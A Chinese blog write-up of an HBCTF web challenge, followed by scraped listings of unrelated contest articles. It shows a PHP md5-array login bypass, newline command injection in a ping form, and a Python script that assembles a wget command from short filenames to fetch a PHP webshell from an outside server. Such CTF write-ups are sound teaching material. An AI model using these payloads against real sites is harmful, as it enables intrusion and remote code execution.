关于第一场HBCTF的Web题小分享,当作自身的笔记2

昨天晚上6点开始的HBCTF,虽然是针对小白的,但有些题目确实不简单。

昨天女朋友又让我帮她装DOTA2(女票是一个不怎么用电脑的),然后又有一个小白问我题目,我也很热情的告诉她了,哎,真耗不起。

言归正传:

————————————————————————————————我是分割线———————————————————————————————————————————————————————

对于那道200分的Web题真是难得有水平。

function d_addslashes($array){
    foreach($array as $key=>$value){
        if(!is_array($value)){
              !get_magic_quotes_gpc()&&$value=addslashes($value);
              $array[$key]=$value;
        }else{
          $array[$key]=d_addslashes($array[$key]);
        }
    }
    return $array;
}
$_POST = d_addslashes($_POST);
$_GET =  d_addslashes($_GET);

首先发现有备份文件  index.php.bak  下载下来,进行审计;发现有伪全局过滤,注入就别想了.再继续往下看,这里存在一个逻辑漏洞:

$username =isset($_POST[‘username‘])?$_POST[‘username‘]:die();
$password = isset($_POST[‘password‘])?md5($_POST[‘password‘]):die();
$sql="select password from users  where username=‘$username‘";
$result = $conn->query($sql);
if(!$result){
    die(‘<script>alert("用户名或密码错误!!")</script>‘);
}
$row = $result->fetch_assoc();
if($row[0] === $password){
    $_SESSION[‘username‘]=$username;
    $_SESSION[‘status‘]=1;
    header("Location:./ping.php");
}else{
   die("<script>alert(‘用户名或密码错误!!‘)</script>");
}

关键点在这里:

if(!$result){
    die(‘<script>alert("用户名或密码错误!!")</script>‘);
}

即便是我们输入一个不存在的用户,这if也永远不会被执行,因为 $db->query($sql) 返回的是一个mysql resource类型,始终不可能为空. 你可以用

var_dump($result)

试一下.

接下来就考察对php的熟悉程度了

$row[0] === $password

如果我们输入了一个不存在的用户名,那么$row[0] 是等于 NULL的,但是 md5($array) 也是返回 NULL,所以只需要让password是一个数组,就可以绕过这里

所以最终用户名密码为:

username=1&password[]=1

绕过登陆之后,发现可以执行ping命令,经过测试发现:

1. ip 必须是 x.x.x.x 的格式, x 代表 1-3个数字

2. ip长度必须大于等于7,小于等于15,否则都会返回ip格式错误

3. 可以使用这样格式的ip: x.x.x.x[任意字符]

当 ip为ip=0.0.0.1||2时,返回 PING 0.0.0.12 (0.0.0.12): 56 data bytes

说明了|| 被替换为空了,同样道理,你可以发现&,$,(),;`,都被替换为了空

最后发现 %0a没有被过滤:

测试:ip=0.0.0.1%0als -al,返回如下,说明ls已经成功执行.

PING 0.0.0.1 (0.0.0.1): 56 data bytes
total 8
drwxr-xr-x 2 www-data www-data 4096 Apr  7 04:54 .
drwxr-xr-x 5 www-data www-data 4096 Apr  7 04:54 ..

测试:ip=0.0.0.1%0apwd,返回了当前的绝对路径:

PING 0.0.0.1 (0.0.0.1): 56 data bytes
/usr/share/nginx/html/sandBox/10.36.101.50

发现只有七个字符的可控输入空间,就是7个字符的命令执行啦,参考这篇文章http://wonderkun.cc/index.html/?p=524

下面给出python的payload吧:

#!/usr/bin/python
#-*- coding: utf-8 -*- 

import requests
def GetShell():
    url = "http://vctf.ctftools.com/ping.php"
    header = {
        "Cookie":"PHPSESSID=5rfro3re8253tv5f6fp5kd74l6",
        "Content-Type":"application/x-www-form-urlencoded"
    }
    #fileNames = ["1.php","-O\ \\","cn\ \\","\ a.\\","wget\\"]
    # linux创建中间有空格的文件名,需要转义,所以有请求"cn\ \\"
    # 可以修改hosts文件,让a.cn指向一个自己的服务器。
    # 在a.cn 的根目录下创建index.html ,内容是一个php shell
    ‘‘‘
    wget\    \ wo\    nd\    er\    ku\    n.\    cc\ \    -O\ \    1.php
    ‘‘‘
    fileNames = ["1.php","-O\ \\\\","cc\ \\\\","n.\\\\","ku\\\\","er\\\\","nd\\\\","\ wo\\\\","wget\\\\"]
    ip = "0.0.0.1%0a"
    for fileName in fileNames:
        createFileIp = ip+">"+fileName
        print createFileIp
        data="ip="+createFileIp

        requests.post(url,data=data,headers=header)

    proxy = {"http":"127.0.0.1:8080"}
    getShIp = ip + "ls%20-t>1"
    print getShIp
    data="ip="+getShIp
    requests.post(url,data=data,headers=header,proxies=proxy)
    getShellIp = ip + "sh%201"
    print getShellIp
    data="ip="+getShellIp
    requests.post(url,data=data,headers=header,proxies=proxy)
    shellUrl = "http://vctf.ctftools.com/sandBox/10.25.159.132/1.php"    #10.25.159.132为自己IP
    response = requests.get(shellUrl)
    if response.status_code == 200:
        print "[*] Get shell !"
    else :
        print "[*] fail!"
if __name__ == "__main__":
    GetShell()

拿到shell之后,连接本地的数据库,获取flag

谢谢,第一次写博客,大牛们勿喷。谢谢,以后会继续努力,发一些干货。

时间: 2024-10-10 18:02:20

关于第一场HBCTF的Web题小分享,当作自身的笔记2的相关文章

2017 计蒜之道 初赛 第一场 A、B题

A题 阿里的新游戏 题目概述: 阿里九游开放平台近日上架了一款新的益智类游戏--成三棋.成三棋是我国非常古老的一个双人棋类游戏,其棋盘如下图所示: 成三棋的棋盘上有很多条线段,只能在线段交叉点上放入棋子.我们可以用坐标系来描述棋盘: 如果一条线段上的三个交叉点都被同一玩家的棋子占据的话,则称这条线段被该玩家 成三.现在,小红和小明两人在游戏平台上下棋,其中小红的棋子是黑色的.请你帮小红计算他成三的线段数. 样例对应的棋盘如下: 输入格式 输入第一行两个整数 n,m(3 \le n, m \le

2018第一场多校 -补题

Distinct Values PS:思路巨明显,就是代码写不出,总想着一次更新一条线段.这里用一个set,存的是当前能用的数的.怎么去更新set,记录上一个区间的左右端点 l , r ,然后类似于莫队的写法....看代码吧.注意上一个区间和当前区间没有公共端点时要特判!!!,也就是代码中的 if 语句 . #include<cstdio> #include<cstring> #include<iostream> #include<algorithm> #i

2014多校第一场 I 题 || HDU 4869 Turn the pokers(费马小定理+快速幂模)

题目链接 题意 : m张牌,可以翻n次,每次翻xi张牌,问最后能得到多少种形态. 思路 :0定义为反面,1定义为正面,(一开始都是反), 对于每次翻牌操作,我们定义两个边界lb,rb,代表每次中1最少时最少的个数,rb代表1最多时的个数.一张牌翻两次和两张牌翻一次 得到的奇偶性相同,所以结果中lb和最多的rb的奇偶性相同.如果找到了lb和rb,那么,介于这两个数之间且与这两个数奇偶性相同的数均可取到,然后在这个区间内求组合数相加(若lb=3,rb=7,则3,5,7这些情况都能取到,也就是说最后的

2014多校第一场D题 || HDU 4864 Task (贪心)

题目链接 题意 : 用N台机器,M个任务,每台机器都有一个最大工作时间和等级,每个任务有一个需要工作时间和一个等级.如果机器完成一个任务要求是:机器的工作时间要大于等于任务的时间,机器的等级要大于等于任务的等级.一台机器只能完成一个任务,一个任务只能被一台机器完成.每个机器完成一个任务公司能够获得500*xi+2*yi (此处xy都是指被完成的任务的).输出所有机器能完成的最多任务数,和最大盈利. 思路 :贪心,自己做的时候想了各种排序都不对,没有考虑到500*xi+2*yi 这个公式的重要性.

2014多校第一场 E 题 || HDU 4865 Peter&#39;s Hobby (DP)

题目链接 题意 : 给你两个表格,第一个表格是三种天气下出现四种湿度的可能性.第二个表格是,昨天出现的三种天气下,今天出现三种天气的可能性.然后给你这几天的湿度,告诉你第一天出现三种天气的可能性,让你求出最可能出现的天气序列 . 思路 : 定义第 i 天叶子湿度为hum[i].第 i 天,天气为 j 的最大概率为dp[i][j].wealea[i][j]表示天气为 i 叶子为j的概率,weawea[i][j]表示今天天气为 i 明天天气为j的概率,st[i]表示第一天天气为i的概率.pre[i]

多校第一场 费马小定理+模拟+组合数学

A题:Couple doubi 链接:http://acm.hdu.edu.cn/showproblem.php?pid=4861 这题逗逼了,刚开始根本就没什么思路,刚开始看题的时候有点像费马小定理,但是这个定理我只知道,然后没用过.看了下定义,有点不一样的是反着的,然后反着的我又不会转化,尼玛,就这样错过了最好的解题方法.然后队友又理解错题意了.WA了多发,然后我重新看了下题意,然后队友才发觉理解错题意了,然后找了规律才A. 代码比较短,就不贴了,真的写吧. if(k/(p-1)&1) pu

2014多校第一场A题 || HDU 4861 Couple doubi

题目链接 题意 : 有K个球,给你一个数P,可以求出K个值,(i=1,2,...,k) : 1^i+2^i+...+(p-1)^i (mod p).然后女朋友先取,再xp取,都希望赢,如果女朋友能赢输出YES,否则输出NO 思路 :这个题,在纸上算算差不多就出来结果了,因为要赢,所以一开始必定拿大的,根据规律可以发现最后的那个取余结果不是0就是某个数,所以就看那个数有奇数个还是偶数个即可. 官方题解: 1 #include <stdio.h> 2 #include <string.h&g

hdu 5288||2015多校联合第一场1001题

http://acm.hdu.edu.cn/showproblem.php?pid=5288 Problem Description OO has got a array A of size n ,defined a function f(l,r) represent the number of i (l<=i<=r) , that there's no j(l<=j<=r,j<>i) satisfy ai mod aj=0,now OO want to know ∑i

Dream_Chaser队训练赛第一场 I题

Dream_Chaser队训练赛第一场 I题 题目来自2012成都区域赛 I - Count Time Limit:1000MS     Memory Limit:32768KB     64bit IO Format:%I64d & %I64u Submit Status Practice HDU 4472 Description Prof. Tigris is the head of an archaeological team who is currently in charge of a